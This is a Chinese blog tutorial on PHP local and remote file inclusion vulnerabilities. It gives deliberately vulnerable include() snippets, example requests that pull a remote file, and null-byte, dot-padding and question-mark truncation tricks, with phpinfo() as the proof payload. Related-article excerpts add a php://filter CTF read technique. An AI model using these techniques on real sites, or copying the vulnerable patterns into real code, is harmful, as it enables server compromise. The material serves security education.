PHP文件包含漏洞

最新推荐文章于 2024-04-25 13:59:04 发布
最新推荐文章于 2024-04-25 13:59:04 发布
阅读量1.2k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liuhuaijin/article/details/77289674
版权

PHP的文件包含可以直接执行包含文件的代码,包含的文件格式是不受限制的。

文件包含分为本地文本包含(local file include)和远程文件包含(remote file include)

文件包含函数有:include(),include_once(),require()和require_once(), 它们之间的区别在于include()和include_once()在包含文件时即使遇到错误,下面的代码也会继续执行;而require()和require_once()则会直接报错退出程序。它们的写法可以在括号里面写要包含的路径,也可以直接用空格再跟路径。

1.本地文件包含是指只能包含本机文件的包含漏洞,大多出现在模块加载,模板加载和cache调用的地方

payload:

<?php define("ROOT",dirname(__file__).'/');

$mod=$_GET['a'];  //加载模块

include(ROOT.$mod.'.php');

?>

请求1.php?a=2 , 其中2.php的内容为<?php phpinfo(); ?>

2.远程文本包含是指可以包含远程文件的包含漏洞,远程文件包含需要设置allow_url_include=on

payload:

<?php include($_GET['url']);?>

请求url参数传入“http://remotehost/2.txt”, 其中2.txt的内容为<?php phpinfo();?>

文件包含截断:正常程序里面包含的文件代码一般像include(basepath.$mod.'.php')或者include($mod.'.php'),如果不能写入.php的后缀名的文件,则需要截断

1.利用%00截断

payload:

<?php include $_GET['a'].'.php'?>

请求1.php?a=2.txt%00, 其中2.txt的内容为<?php phpinfo();?>

注意:%00截断受限于GPC开启和addslashes等函数的过滤,且在5.3之后的版本不能用这个方法截断

2.利用点句(.)和反斜杠(/)来截断

payload:

<?php $str=' '; for($i=0;$i<=240;$i++) {$str.='.';}

$str='2.txt'.$str; include $str.'.php'; ?>

注意:这种方法不受GPC限制,不过在php5.3之后被修复

3.利用问号(?)伪截断

payload:

<?php include $_GET['a'].'.php'?>

请求1.php/a=2.txt?, 其中内容为<?php phpinfo();?>

玄瞋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP include 漏洞扫描器
06-05
PHP包含漏洞扫描器的源代码,horse_b制作,多线程的好例子下载可以到www.horseb.org的"原创源码"里下载
PHP漏洞文件包含漏洞
dogeace的博客
11-28 1760
php语言中存在着下面几个函数存在文件包含的的功能,这些函数的本意是方便开发者及用户实现某些功能,但是如果不对文件包含的内容进行严格的的限定,会被攻击者恶意利用。这就是php文件包含漏洞。下面有四个函数可以实现文件包含分别是: 1.include();用此函数包含的时候,如果出现错误,会提出警告,跳过此步骤继续执行剩下的代码。 2.require();此函数文件包含出现错误的时候,终止程序的运行,与include()区别就是这里。 3.include_once()与1的唯一区别是文件只被包含一次,避免文
Web漏洞-文件包含漏洞超详细全解(附实例)_【web漏洞百例】
最新发布
2401_84215240的博客
04-25 1228
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…4.因为这里展示的是show.php文件,因此我们想到直接去访问show.php文件,可以看到当我们直接访问show.php时,网站返回的也是同样的内容。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
PHP文件包含(include)致命漏洞
创业的程序员
12-29 1535
<br />假如你的网站目录下有个这样的文件:<?php$file=$_GET['f'];$file=str_replace(".","",$file);include($file.".jpg");你会觉得存在致命漏洞么,比如我想让最后一句变成 include(test.php);你觉得有可能吗?其实很简单,除了.用于标识文件扩展名之外,还可以用 “,地址栏输入 ?f=test”php%00 就可以达到目的了,%00是ascii码为0的字符,在这里会产生截断,而 test”php,被include当成了te
PHP文件包含漏洞(利用phpinfo)
Li-D的博客
12-31 8502
漏洞描述 文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 PHP中引发文件包含漏洞的通常是以下四个函数: 1、include()当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 2、include_once()功能和include()相同,区别在于当重复调用同一文件时,程序只调用一次。 3、require()只要程序一执行就
PHP文件包含漏洞复现
春日野穹
09-17 2954
引言~ 老规矩,介绍一波原理先 PHP文件包含原理: 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当使用该函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个...
PHP 网络开发详解之远程文件包含漏洞
10-29
由于PHP支持使用相同的函数(Function)对本地文件和远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
Mang0-php文件包含漏洞.zip
03-12
**PHP文件包含漏洞详解** 在Web开发中,PHP是一种广泛使用的服务器端脚本语言,它提供了许多功能强大的特性,如文件包含(file inclusion)。然而,这些特性如果不慎使用,可能会导致安全问题,其中之一就是“文件...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
php 远程包含文件漏洞分析第1/6页
10-29
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这...
php文件包含漏洞详解
weixin_61835841的博客
10-05 394
文件包含漏洞相关知识及复现
PHP文件包含漏洞总结
坚持硬核
10-07 3273
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
php本地包含include,eXtplorer include/init.php本地文件包含漏洞
weixin_35897479的博客
03-13 103
eXtplorer include/init.php本地文件包含漏洞发布日期:2009-03-02更新日期:2009-03-03受影响系统:Soeren Eberhardt eXtplorer 2.0.0不受影响系统:Soeren Eberhardt eXtplorer 2.0.1描述:BUGTRAQ ID: 33955eXtplorer是一款基于web的文件管理组件。eXtplorer的inc...
php 文件包含漏洞,文件包含漏洞总结
weixin_28630185的博客
03-12 301
前言:本人(九世)正式从博客园:迁移到:http://hackhat.net。会进行同步更新正文:漏洞来源:文件包含漏洞,得从文件包含说起。一般写代码的人都知道,完成一个项目里面有很多的文件调用和引用而文件包含漏洞,因为文件包含的时候没有做对应的防御措施导致引用的文件变成攻击者所指定的文件PHP中提供了四个文件包含的函数函数名称特点include遇到错误,仍会执行include_once遇到错误...
PHP代码审计6—文件包含漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-27 1879
文件包含漏洞整理与历史漏洞分析
php include 远程文件路径,php远程文件包含漏洞(一)
weixin_31894867的博客
03-10 850
(服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。涉及到的危险函数:include(),require()和include_once(),require_once()Include:包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。Require:跟incl...
php文件包含漏洞的危害,php文件包含漏洞小结
weixin_28689507的博客
03-19 532
本文由 东塔网络安全学院学员---吴同学 投稿。0x00 文件包含的出现开发者为了节约开发时间,可以将重复利用的代码使用文件包含的函数,如include,reuqire等进行文件包含,大大节约开发的时间和成本。0x01文件包含函数Include:包含并指定运行的函数。如果未找到文件则include结构会发出一条警告。Require:包含并指定运行的函数。如果未找到文件则include结构会发出一个...
[ACTF2020 新生赛]Include
rang的博客
10-18 270
点击tips Can you find out the flag?源代码也看不到有用的东西 上burp 无解 现在考虑 “php://input"伪协议 + POST发送PHP代码 的经典套路 发现php://input被过滤 php://filter"伪协议” 来进行包含。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。 构造Payload: ?file=php://filter/read=convert.bas.
常见的PHP安全漏洞-跨站、注入和文件包含
yuananhh的博客
06-26 2450
安全历来是网络编程重要的组成部分,PHP作为一门服务器端脚本语言,直接与服务器有密切的联系,如果书写安全的PHP代码,如何避免最基本的攻击手段,下面我简单的给出了PHP三种最常见的攻击手段以及防范办法。本文取自网络文章,出处不详。但是通俗易懂,很利于初学者对安全有所认知。 1.include的时候要小心,要判断你本地是否有这个文件,以免造成安全漏洞。 比如: <?php includ
include$_GET['a']?>&a= 为什么是这种写法
05-10
这种写法是一种常见的代码注入攻击方式,称为 PHP 变量覆盖攻击。攻击者通过构造恶意的 URL,将变量名作为参数名传入,使用 `$_GET` 超全局变量获取参数值,从而实现对变量的覆盖,达到执行恶意代码的目的。 例如,攻击者构造的 URL 为 `http://www.example.com/index.php?%00=1&a=2`,此时 `$_GET['%00']` 的值为 1,而不是期望的 `$a` 参数值。 为了防止此类攻击,应该对输入的数据进行过滤和验证,不信任任何用户输入,并且不要将用户输入作为变量名、函数名或类名等直接使用。建议使用 `filter_input()` 函数来过滤用户输入,或者使用框架提供的输入验证和过滤功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值